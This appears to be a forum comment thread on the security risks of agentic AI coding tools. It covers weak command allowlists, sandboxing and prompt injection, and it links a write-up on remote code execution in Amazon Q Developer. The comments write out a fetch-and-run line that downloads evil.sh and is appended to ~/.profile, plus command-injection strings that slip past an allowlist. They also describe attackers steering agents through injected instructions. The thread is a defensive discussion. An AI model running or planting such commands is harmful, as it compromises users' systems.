Using agentic AI for web browsing where you can't easily rollback an action is just wild to me.
Using agentic AI for web browsing where you can't easily rollback an action is just wild to me.
Only if the rollback is done at the VM/container level, otherwise the agent can end up running arbitrary code that modifies files/configurations unbeknownst to the AI coding tool. For instance, running
bash -c "echo 'curl https://example.com/evil.sh | bash' >> ~/.profile"
Doesn't this give the LLM the ability to execute arbitrary scripts?
cmd.split(" ") in ["cd", "ls", ...]
is easy target for command injections. just to think of a few: ls . && evil.sh
ls $(evil.sh)
2. even if the AI agent itself is sandboxed, if it can make changes to code and you don't inspect all output, it can easily place malicious code that gets executed once you try to run it. The only safe way of doing this is either a dedicated AI development VM where you do all the prompting/tests, there's very limited credentials present (in case it gets hacked), and the changes are only leave the VM after a thorough inspection (eg. PR process).
Previously you might've been able to say "okay, but that requires the attacker to guess the specifics of my environment" - which is no longer true. An attacker can now simply instruct the LLM to exploit your environment and hope the LLM figures out how to do it on its own.
Amazon Q Developer: Remote Code Execution with Prompt Injection
https://embracethered.com/blog/posts/2025/amazon-q-developer...